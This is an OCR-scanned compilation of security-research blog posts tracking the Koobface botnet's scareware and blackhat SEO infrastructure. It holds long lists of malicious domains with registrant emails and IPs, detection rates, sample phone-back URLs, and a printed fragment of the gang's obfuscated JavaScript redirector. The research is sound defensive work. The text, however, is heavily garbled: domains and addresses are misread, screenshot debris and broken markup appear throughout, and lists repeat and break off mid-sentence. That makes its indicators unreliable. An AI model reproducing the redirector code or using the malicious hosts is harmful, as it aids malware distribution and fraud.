cool-tube-porn .net - Email: robertsimonkroon@gmail.com 
cool-tube-porn .org - Email: robertsimonkroon@gmail.com 
download-free-now .net - Email: robertsimonkroon@gmail.com 
download-free-now .org - Email: robertsimonkroon@gmail.com 
download-free-soft .com - Email: robertsimonkroon@gmail.com 
download-free-soft .net - Email: robertsimonkroon@gmail.com 
download-scaner-free .com - Email: robertsimonkroon@gmail.com 
ekjsoft .eu 
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fdglsoft .in - Email: petrenko.kolia@yandex.ru 
free-virus-scanner .net - Email: robertsimonkroon@gmail.com 
kleqsoft .in - Email: petrenko.kolia@yandex.ru 
kitysoft .in - Email: petrenko.kolia@yandex.ru 
ktyjsoft .in - Email: petrenko.kolia@yandex.ru 


my films 


my films 


Youur) 


Broadcast Yourself '” 


i @ 0:00/0:00 «4 G2) a Cg 


kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 

mgtlsoft .in - Email: petrenko.kolia@yandex.ru 

porn-sex-tube .net - Email: robertsimonkroon@gmail.com 
porn-sex-tube .org - Email: robertsimonkroon@gmail.com 
scan-free-malware .net - Email: robertsimonkroon@gmail.com 
scan-free-malware .org - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .com - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .info - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .net - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .com - Email: robertsimonkroon@gmail.com 
tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
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tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 
tube-porn-sex .org - Email: robertsimonkroon@gmail.com 


What’s so special about the robertsimonkroon@gmail.com email anyway? It’s the fact 
that not only was [25]the email was once again used to register [26]scareware domains two 
times in July, 2009, but also, as pointed out in November 2009’s "[27]Koobface Botnet’s 
Scareware Business Model - Part Two", the same email was used to register the following 
download locations for scareware domains pushed by the Koobface botnet: 


Oni901s3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4pe .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8&q8 .cn - Email: robertsimonkroon@gmail.com 
kt4Ilwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 
4g04i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
kzvi4iiutr11le .cn - Email: robertsimonkroon@gmail.com 
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 
fb7pxcqyb45o0e .cn - Email: robertsimonkroon@gmail.com 
fyivbri3bOdyf .cn - Email: robertsimonkroon@gmail.com 
z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 
ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 
fluqidfi3qkcm .cn - Email: robertsimonkroon@gmail.com 
7mx1z5jqOnt3o .cn - Email: robertsimonkroon@gmail.com 
3uxyctrilmiqeo .cn - Email: robertsimonkroon@gmail.com 
pOumob9k2g7mp .cn - Email: robertsimonkroon@gmail.com 
od32qjx6megqos .cn - Email: robertsimonkroon@gmail.com 
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 
7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com 


Stay tuned for a massive Koobface related activities update, analyzing the gang’s 
multi-tasking throughout the entire January, 2010 - descriptive historical OSINT 
offers long-term value in cross-checking for connections. 


Related Koobface gang/botnet research: 

[28]How the Koobface Gang Monetizes Mac OS X Traffic 

[29]The Koobface Gang Wishes the Industry "Happy Holidays" 
[30]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[31]Koobface Botnet Starts Serving Client-Side Exploits 

[32]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
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[33]Koobface Botnet’s Scareware Business Model - Part Two 
[34]Koobface Botnet’s Scareware Business Model - Part One 
[35]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[36]New Koobface campaign spoofs Adobe’s Flash updater 
[37]Social engineering tactics of the Koobface botnet 
[38]Koobface Botnet Dissected in a TrendMicro Report 
[39]Movement on the Koobface Front - Part Two 
[40]Movement on the Koobface Front 

[41]Koobface - Come Out, Come Out, Wherever You Are 
[42]Dissecting Koobface Worm’s Twitter Campaign 


The Diverse Portfolio of Fake Security Software Series: 

[43]A Diverse Portfolio of Fake Security Software - Part Twenty Four 
[44]A Diverse Portfolio of Fake Security Software - Part Twenty Three 
[45]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[46]A Diverse Portfolio of Fake Security Software - Part Twenty One 
[47]A Diverse Portfolio of Fake Security Software - Part Twenty 
[48]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[49]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[50]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[51]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[52]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[53]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[54]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[55]A Diverse Portfolio of Fake Security Software - Part Twelve 
[56]A Diverse Portfolio of Fake Security Software - Part Eleven 
[57]A Diverse Portfolio of Fake Security Software - Part Ten 

[58]A Diverse Portfolio of Fake Security Software - Part Nine 

[59]A Diverse Portfolio of Fake Security Software - Part Eight 

[60]A Diverse Portfolio of Fake Security Software - Part Seven 
[61]A Diverse Portfolio of Fake Security Software - Part Six 

[62]A Diverse Portfolio of Fake Security Software - Part Five 

[63]A Diverse Portfolio of Fake Security Software - Part Four 

[64]A Diverse Portfolio of Fake Security Software - Part Three 
[65]A Diverse Portfolio of Fake Security Software - Part Two 
[66]Diverse Portfolio of Fake Security Software 


This post has been reproduced from [67]Dancho Danchev’s blog. Follow him [68]on Twitter. 
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6.2.7 A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the 
Koobface Gang (2010-02-04 00:50) 


3054 


<script>(LF} 

// KROTEG(LE) 

var aOcSeS2 = [(L! 

("fdaicdqe lbonnopqqdk.nllpeplojdpm". replace (/ ([diqlnpj)+/g,""),'fb2'), (1! 
["tkpabfgpbgqnrerd.bkrceknomkh". replace (/[kpbfqnrh] +/g,""),'toq'], (LF) 

("flgr ibabegngkdhjabsbbtaelrkk.bhgchombb”. replace (/(lgbakh})+/g,""),'fr'), (1! 
("mrdkjyisfdjdphgfabrcbfeil. lejonqmdaj”. replace (/[rdkjfhgbilng] +/g,""),'ms'], (1! 
("masqpqlfiaqnakdbsb. qjcgofemgh”.replace (/ [aqfdbjgeh)+/g,""),'ms'), (1! 
["ljijnkb.jipemoush". replace (/[jbipcou] +/g,""),'ms'], (LF) 
("mlpygifyfgnefqqanqrnjbpfoloiikji.ngjdcjfoqhmda"”. replace (/[{ilpgjfnqidh) +/g,""),' yb'), (18) 
("f£piudkb lanhirg. pikickhoqlm".replace(/[pidklnhgq] +/g,""),'fu')],(! 
["talwihtgtgedbrdp.benaqoamgftk". replace (/ [alhgdbpnqfk] +/g,""),'tw'), (LF) 

("hj inbfSe.npscgnogugmjj".replace (/[jnbfepsgu] +/g,""),'hiS'], (1! 
("bpiedukbugioruhh.kleftnonlfpmhna". replace (/[pidukgrhlftna] +/g,""), 'be'] (LF) 
) + CLF] 

var bidt814 = [[L! 

"67." + '205.216.67' , ez} 

'86.7' + '4.167.16', [LI 

'216' + '.240.243.14', (LE) 

'84.1' + '09.115.225', [LF] 

'93.172' + ' 20.68", fLF} 

'115.' + '42.68.143', (11 

Gi oe aie eek Ge 

'67.64.' + '119.34', (LI 

'96." # '251.116.1210" , cu 

'109' + '.65.36.143', (LF) 

ot? 206." + "155 216", ti 

'99.' + '166.73.29', [LE] 

'66.97.' #* '21.162', cu 

'99.' + '97.80.182', [LF] 

'8S.67.' + '19.204', (LI 

US oa VERS Oe) ue 

'86.1' + '12.14.239', (LF) 

'173" + '.21.167.160"' , [LF] 

'68.80' + '.233.49', (LI 

'97.96' + '.232.201', [LI 

) + CLF] 


With [1]scareware/rogueware/fake security software continuing to be the cash-cow choice for 
the Koobface gang, keeping them on a short leash in order to become the biggest [2]opportu- 
nity cost for the gang’s business model is crucial. The following are currently active blackhat 
SEO redirectors/Koobface-infected hosts redirectors and actual scareware domains courtesy 
of the gang. 
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Dhtml> 
LABEL COOEC 


head> 
title>Loading</title 
cmota name*"robots” centent*"noindex, nofollow, noarchive” 


Window. top. location= location: ) catch (e) ()) window.onerror*handleError: tf (window 


si0n() tor.userAgent: var moie © wa. index! 
} . ov. getElement iyid('si1e') -leunchil 
ov (danger VindAdr) : se! 
st se Vindow.addiventLiatener (“unioad”, iter, false); 
} 
script 
<script type="text ("<OB3"+' ECT ad="4'+"se" width="0" heaght="0" style="position:absolute; left:O;top:07" CLAS’ +'SID©"CL3' 4" Tl 


#cript languages") sc 
wcript languages" jeve: 
= (nevigar 


Blackhat SEO redirectors, also embedded at Koobface-infected hosts, with identical redirector 
ID (?pid=312s02 &sid=4db12f): 


freeticketwin.com - 91.212.226.25 - Email: test@now.net.cn 
lotteryvideowin.com - Email: test@now.net.cn 
videohototplaypoker.com - Email: test@now.net.cn 
financetopsecrets.com - Email: test@now.net.cn 
how2winforex.com - 91.212.226.136 - Email: test@now.net.cn 
2money4money.com - Email: test@now.net.cn 
get-money-quickly.com - Email: test@now.net.cn 

fordusedsales .com - 193.104.106.250 - Email: test@now.net.cn 
buylexuscustoms .com - 91.212.226.185 - Email: test@now.net.cn 
tracegirlsonline .com - 89.248.168.22 - Email: test@now.net.cn 
skypetollfree .com - 96.44.128.245 - Email: test@now.net.cn 
dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 


bewareoffreebies .com - Email: test@now.net.cn 
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harry-the-potter .com - Email: test@now.net.cn 
getlancomediscount .com - Email: baldwinnere@yahoo.co.uk 
vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 
lady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 


winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletwmodeltoys.com 
delhiwebcamera.com A 
discounts-org.com 
discounts22.com 
global-d-securitycom 
jacksonpollocksite.com 
lexusbestparts.com 
max6antispyware.com 


megal-scannercom 
" 96.44.129.0/18 ——S-ge 4522298 


mega2-scannercom A 96.44.128.245 a 


mega4-scannercom 


hosted.by.qudranetcom 


mega6-scannercom 
mega?-scannercom 
microantivirus-scanner0.com 
microanthirusscannerl.com 
microanthirusscanner2.com 
pro-2inl-securityh.com 
spy-detectoracom 


Z3-antispyware.com 


chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 
volvomodeltoys .com - Email: CourtneyRWebb@aol.com 
manilawebcamera .com - Email: monkey22@live.com 


mumbaiwebcamera .com - Email: monkey22@live.com 
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karachiwebcamera .com - Email: monkey22@live.com 
delhiwebcamera .com - Email: monkey22@live.com 
istanbulwebcamera .com - Email: monkey22@live.com 
lexusmodeltoys .com - Email: monkey22@live.com 
chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 


bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 


Upon redirection, the scareware is served from malware-b-scan .com - 96.44.128.245; 
91.212.226.97; 91.212.226.185; 91.121.45.67, 91.212.226.203, 94.228.209.195 - Email: 
mail@bristonnews.com. 


Sample detection rate for newly introduced scareware samples: [3]Setup _312s2.exe - 
Result: 3/40 (7.5 %), [4]Setup _312s2.exe - Result: 4/39, [5]Setup _312s22.exe - Result: 2/39 
(5.13 %), [6]Setup _312s2.exe - Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 1/40 
(2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), [9]Setup _312s2.exe - Result: 3/39 (7.7 
%). [10]Setup _312s2.exe - Result: 4/40 (10 %), [11]Setup _312s2.exe - Result: 1/40 (2.5 %), 
[12]Setup _312s2.exe - Result: 4/40 (10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[16]Setup _312s2.exe - Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[18]Setup _312s2.exe - Result: 5/41 (12.2 %), [19]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[20]Setup 312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe - Result: 6/41 (14.63 %), 
[22]Setup 312s2.exe - Result: 11/41 (26.83 %), [23]Setup _312s2.exe - Result: 4/42 (9.53 
%). 


Upon execution the sample phones back to winxp7server .com/download/winlogo.bmp 
- 94.228.208.57; rescuesysupdate .com/?b=312s2 - 83.133.125.216. The most recent 
samples (Wednesday, February 10, 2010) phone back to wintimeserver .com/?b=312s2 - 
91.212.226.125 and firmwaredownloadserver .com/download/winlogo.obmp - 94.228.208.57. 
The most recent samples (Sunday, February 21, 2010) phone back to firmwaredown- 
loadserver.com /download/winlogo.bmp - 94.228.208.57; | shifustserver.com /down- 
load/winlogo.bmp - 94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 


The most recent samples (Friday, February 12, 2010) phone back to firmwaredownload- 
server .com/download/winlogo.bmp - 94.228.208.57; checklatestversion .com/?b=312s - 
109.232.225.75. 
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The most recent samples (Wednesday, February 24, 2010) phone back to shifust- 
server.com/download/winlogo.bmp - 94.228.208.57 - Email: viinzer@hotmail.com and 
version-upgrade.com/?b=312s12 - 89.248.168.21. Parked on the same IP are also checklat- 
estversion.com and fastwinupdates.com. 


antispywareObscan.com 


antspywareirito9.com A 
antivirus -for-pe-2.com A 
anthirus for pc-4.com A 


antivirus -for-pe-6.com 
antivirus for pe-8.com 
antvirusprosscan.com 
exta-antiirus-scani.com 
extra-security-scanbl com 
i) 
fun-antirusscand.com 
fun-antwiresscani com % 
91,212.226.203 Be 912.212.226.024 ——At-ge asss77 
fun-anthitusscan3.com ee 
fun-antiresscané.com 
} 
fun-anthirusscans com 4 


runantvieusscan0.com 


runantveusscand.com 
funantveusscan4.com 
runantveusscand.com 
Securepro-antivirusl.com 
Super-scanner-2004.com 
top -raleantvirus0.com 


topantimalware-scanner?.com 


Parked on the same IPs are more scareware domains part of the portfolio: 
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interLantivirus.com - 87.98.130.232- Email: test@now.net.cn 
virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn 
bl9-virus-scanner.com - 87.98.130.232 - Email: test@now.net.cn 
intera-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interc-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interd-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
intere-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
inter-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interLantivirus.com - 87.98.130.232 - Email: test@now.net.cn 
195.5.161.107/psx1/?vih==RANDOM _STRINGS - no domain name 
91.212.132.241 /psx1/?vih==RANDOM STRINGS 
195.5.161.105 /psx1/?vih==RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 
zin-antivirus-scan .com - Email: test@now.net.cn 
nextgen-scannert .com - Email: test@now.net.cn 
protection15scan .com - Email: test@now.net.cn 
nitro-antispyware .com - Email: test@now.net.cn 
z2-antispyware .com - Email: test@now.net.cn 

spy-detectore .com - Email: admin@clossingt.com 
dis7-antivirus .com - Email: admin@vertigosmart.com 
v2comp-scanner .com - Email: admin@vertigosmart.com 
new-av-scannere .com - Email: missbarlingmail@aol.com 
smartvirus-scan6 .com - Email: info@terranova.com 
spywaremaxscan4 .com - Email: out@trialzoom.com 


super6antispyware .com - Email: mail@ordercom.com 
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spyware-max-scan3 .com - Email: out@trialzoom.com 
max-antivirus-security5 .com - Email: mail@dynadoter.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
l-antivirus .com - Email: call555call@live.com 
1m-online-scanner .com - Email: stellar2@yahoo.com 
2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 
3pro-antispyware .com - Email: mail@yahoo.com 
6-antivirus .com - Email: call555call@live.com 
7-antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
a0-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 
aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
adv1-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 


antivirus-expert-r .com - Email: 900ekony@live.com 
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antivirus-expert-y .com - Email: 900ekony@live.com 
antivirussystemscan1 .com - Email: 900ekony@live.com 
antivirussystemscana .com - Email: 900ekony@live.com 
army-antispywarea .com - Email: beliec99@yahoo.com 
army-antispywarei .com - Email: beliec99@yahoo.com 
army-antispywarel .com - Email: beliec99@yahoo.com 
army-antispywarep .com - Email: beliec99@yahoo.com 
army-antivirusa .com - Email: beliec99@yahoo.com 
army-antivirusd .com - Email: beliec99@yahoo.com 
army-antivirust .com - Email: beliec99@yahoo.com 
army-antivirusv .com - Email: beliec99@yahoo.com 


army-antivirusy .com - Email: beliec99@yahoo.com 


b1-online-scanner .com - Email: stellar2@yahoo.com 
best-antiviruskO .com 

bestpd-virusscanner .com - Email: SusanCWagner@yahoo.com 
bestpr-virusscanner .com - Email: SusanCWagner@yahoo.com 
crystal-antimalware .com - Email: mail@vertigocats.com 
crystal-antivirus .com - Email: mail@vertigocats.com 
crystal-pro-scan .com - Email: mail@vertigocats.com 
crystal-pro-scanner .com - Email: mail@vertigocats.com 
crystal-spyscanner .com - Email: mail@vertigocats.com 
crystal-threatscanner .com - Email: mail@vertigocats.com 
crystal-virusscanner .com - Email: mail@vertigocats.com 


extra-spyware-defencea .com - Email: fabula8@live.com 
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extra-spyware-defenceb .com - Email: fabula8@live.com 
malware-a-scan .com - Email: mail@bristonnews.com 
malware-b-scan .com - Email: mail@bristonnews.com 
malware-c-scan .com - Email: mail@bristonnews.com 
malware-d-scan .com - Email: mail@bristonnews.com 
malware-t-scan .com - Email: mail@bristonnews.com 
mega-antispywarea .com - Email: fabula8@live.com 
mega-antispywareb .com - Email: fabula8@live.com 
mm-online-scanner .com - Email: stellar2@yahoo.com 
my-computer-antivirusa .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusb .com - Email: dillinzerl1@yahoo.com 
my-computer-antiviruse .com - Email: dillinzerl1@yahoo.com 
my-computer-antivirusq .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusw .com - Email: dillinzer1@yahoo.com 
my-computer-scanc .com - Email: clintommail2@yahoo.com 
my-computer-scane .com - Email: clintommail2@yahoo.com 
my-computer-scanl .com - Email: clintommail2@yahoo.com 
my-computer-scannera .com - Email: clintommail2@yahoo.com 
my-computer-scannerl .com - Email: clintommail2@yahoo.com 
my-computer-scannerm .com - Email: clintommail2@yahoo.com 
my-computer-scannern .com - Email: clintommail2@yahoo.com 


my-computer-scannerv .com - Email: clintommail2@yahoo.com 


my-computer-scanw .com - Email: clintommail2@yahoo.com 


my-pc-online-scanm .com - Email: dillinzer1@yahoo.com 
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my-pc-online-scann .com - Email: dillinzerL@yahoo.com 
my-pc-online-scanr .com - Email: dillinzer1@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl1@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 
n2-system-scanner .com - Email: JayRKibbe@live.com 
nasa-antivirusl1 .com - Email: call555call@live.com 
nasa-antivirus3 .com - Email: call555call@live.com 
nasa-antivirusa .com - Email: call555call@live.com 
nasa-antivirusb .com - Email: call555call@live.com 
nasa-antiviruso .com - Email: call555call@live.com 
pcl-system-scanner .com - Email: JayRKibbe@live.com 
pc2-system-scanner .com - Email: JayRKibbe@live.com 
proO-antivirus .com - Email: mail@yahoo.com 
proO-system-scanner .com - Email: JayRKibbe@live.com 
prol-system-scanner .com - Email: JayRKibbe@live.com 
pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 
remote-antispywarec .com - Email: teresa2mail.me@live.com 
remote-antispywared .com - Email: teresa2mail.me@live.com 
remote-antispywaree .com - Email: teresa2mail.me@live.com 
remote-antispywarey .com - Email: teresa2mail.me@live.com 
remote-pcl-scanner .com - Email: teresa2mail.me@live.com 


remote-pc-scannera .com - Email: teresa2mail.me@live.com 
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remote-pc-scannerr .com - Email: teresa2mail.me@live.com 
remote-pc-scannerv .com - Email: teresa2mail.me@live.com 


remote-pc-scannery .com - Email: teresa2mail.me@live.com 


run-antivirusscan0,com 


run-antivirusscanl,com 


run-antivirusscan3.com 


run-antivirusscan6.com 


run-antivirusscan8.com 


94.228.209.195 94.228.208.0/20 ——“S-ge AS47869 


runantivirusscan0.com 
runantivirusscan3.com 
runantivirusscan4.com 
runantivirusscan3.com 


securepro-antivirus1.com 


scan3antispyware .com - Email: o@mozzilastuf.com 
scan6antispyware .com - Email: o@mozzilastuf.com 
scan8antispyware .com - Email: o@mozzilastuf.com 
scan-antispywarea .com - Email: o@mozzilastuf.com 
scan-antispywarec .com - Email: o@mozzilastuf.com 
scan-antispywared .com - Email: o@mozzilastuf.com 


scan-antispywarez .com - Email: o@mozzilastuf.com 
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spyware-01-scanner .com - Email: mail@bristonnews.com 
spyware-03-scanner .com - Email: mail@bristonnews.com 
spyware-05-scanner .com - Email: mail@bristonnews.com 
spyware-06-scanner .com - Email: mail@bristonnews.com 
spyware-07-scanner .com - Email: mail@bristonnews.com 
stcanning-your-computerc .com - Email: mitra66@yahoo.com 
stcanning-your-computerd .com - Email: mitra66@yahoo.com 
stcanning-your-computerq .com - Email: mitra66@yahoo.com 
stcanning-your-computerr .com - Email: mitra66@yahoo.com 
stcanning-your-computert .com - Email: mitra66@yahoo.com 
stcanning-your-pca .com - Email: mitra66@yahoo.com 
stcanning-your-pcb .com - Email: mitra66@yahoo.com 
stcanning-your-pcc .com - Email: mitra66@yahoo.com 
stcanning-your-pcd .com - Email: mitra66@yahoo.com 
stcanning-your-pce .com - Email: mitra66@yahoo.com 
stealthvl-antispyware .com - Email: SteveLCartwright@yahoo.com 
stealthv2-antispyware .com - Email: SteveLCartwright@yahoo.com 
stealthv7-antispyware .com - Email: SteveLCartwright@yahoo.com 
stealthv8-antispyware .com - Email: SteveLCartwright@yahoo.com 
stealthv9-antispyware .com - Email: SteveLCartwright@yahoo.com 
verl-system-scanner .com - Email: JayRKibbe@live.com 


ver2-system-scanner .com - Email: JayRKibbe@live.com 


virus-al-scanner .com - Email: mail@bristonnews.com 


virus-al-scanner .com - Email: mail@bristonnews.com 
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virus-b1l-scanner .com - Email: mail@bristonnews.com 


virus-b1l-scanner .com - Email: mail@bristonnews.com 


virus-cl-scanner .com - Email: mail@bristonnews.com 


virus-cl-scanner .com - Email: mail@bristonnews.com 


virus-dl-scanner .com - Email: mail@bristonnews.com 


virus-dl-scanner .com - Email: mail@bristonnews.com 


virus-e2-scanner .com - Email: mail@bristonnews.com 


virus-e2-scanner .com - Email: mail@bristonnews.com 


windowsv5-antispyware .com - Email: 
windowsvé6-antispyware .com - Email: 
windowsv7-antispyware .com - Email: 
windowsv8-antispyware .com - Email: 


windowsv9-antispyware .com - Email: 


SteveLCartwright@yahoo.com 
SteveLCartwright@yahoo.com 
SteveLCartwright@yahoo.com 
SteveLCartwright@yahoo.com 


SteveLCartwright@yahoo.com 


z0-online-scanner .com - Email: stellar2@yahoo.com 


z1-online-scanner .com - Email: stellar2@yahoo.com 
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Active scareware domains. portfolio (blackhat SEO/Koobface pushed) parked 
[24]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd : 


antispy-download .org - Email: robertsimonkroon@gmail.com 
scanner-virus-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
tube-sex-porn .org - Email: robertsimonkroon@gmail.com 
download-free-files .org - Email: robertsimonkroon@gmail.com 


tube-porn-best .org - Email: robertsimonkroon@gmail.com 


at 
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scan-your-pc-now .org - Email: michaeltycoon@gmail.com 
scanner-virus-free .com - Email: robertsimonkroon@gmail.com 
tube-sex-porn .com - Email: robertsimonkroon@gmail.com 
scanner-free-virus .com - Email: robertsimonkroon@gmail.com 
tube-porn-best .com - Email: robertsimonkroon@gmail.com 
antispy-download .info - Email: robertsimonkroon@gmail.com 
soft-download-free .info - Email: robertsimonkroon@gmail.com 
scanner-virus-free .info - Email: robertsimonkroon@gmail.com 
scanner-free-virus .info - Email: robertsimonkroon@gmail.com 


scan-your-pc-now .info - Email: michaeltycoon@gmail.com 


adult-tube-free .net - Email: michaeltycoon@gmail.com 
scanner-virus-free .net - Email: robertsimonkroon@gmail.com 
tube-sex-porn .net - Email: robertsimonkroon@gmail.com 
download-free-files .net - Email: michaeltycoon@gmail.com 
scanner-free-virus .net - Email: robertsimonkroon@gmail.com 
tube-porn-best .net - Email: robertsimonkroon@gmail.com 
ekjsoft .eu - Email: robertsimonkroon@gmail.com 
antispy-download .biz - Email: robertsimonkroon@gmail.com 
soft-download-free .biz - Email: robertsimonkroon@gmail.com 
scanner-virus-free .biz - Email: robertsimonkroon@gmail.com 
free-malware-scan .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 


download-free-files .biz - Email: michaeltycoon@gmail.com 
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eranneiteeeNiAlc «biz - Email: robertsimonkroon@gmail.com 
download-free-soft .biz - Email: robertsimonkroon@gmail.com 
tube-porn-best .biz - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 
porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 
alrzsoft .in - Email: petrenko.kolia@yandex.ru 


antispy-download .biz - Email: robertsimonkroon@gmail.com 
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cool-tube-porn .net - Email: robertsimonkroon@gmail.com 
cool-tube-porn .org - Email: robertsimonkroon@gmail.com 
download-free-now .net - Email: robertsimonkroon@gmail.com 
download-free-now .org - Email: robertsimonkroon@gmail.com 
download-free-soft .com - Email: robertsimonkroon@gmail.com 
download-free-soft .net - Email: robertsimonkroon@gmail.com 
download-scaner-free .com - Email: robertsimonkroon@gmail.com 
ekjsoft .eu 

fdglsoft .in - Email: petrenko.kolia@yandex.ru 
free-virus-scanner .net - Email: robertsimonkroon@gmail.com 
kleqsoft .in - Email: petrenko.kolia@yandex.ru 

kitysoft .in - Email: petrenko.kollia@yandex.ru 


ktyjsoft .in - Email: petrenko.kolia@yandex.ru 
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my films 


my films 


(i Tube} 


Broadcast Yourself ™ 


ii @ 0:00 / 0:00 


kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 

mgtlsoft .in - Email: petrenko.kolia@yandex.ru 

porn-sex-tube .net - Email: robertsimonkroon@gmail.com 
porn-sex-tube .org - Email: robertsimonkroon@gmail.com 
scan-free-malware .net - Email: robertsimonkroon@gmail.com 
scan-free-malware .org - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .com - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .info - Email: robertsimonkroon@gmail.com 


spyware-scaner-free .net - Email: robertsimonkroon@gmail.com 


s 


HO t= = | 
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spyware-scaner-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .com - Email: robertsimonkroon@gmail.com 
tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 


tube-porn-sex .org - Email: robertsimonkroon@gmail.com 


What’s so special about the robertsimonkroon@gmail.com email anyway? It’s the fact 
that not only was [25]the email was once again used to register [26]scareware domains two 
times in July, 2009, but also, as pointed out in November 2009’s "[27]Koobface Botnet’s 
Scareware Business Model - Part Two", the same email was used to register the following 
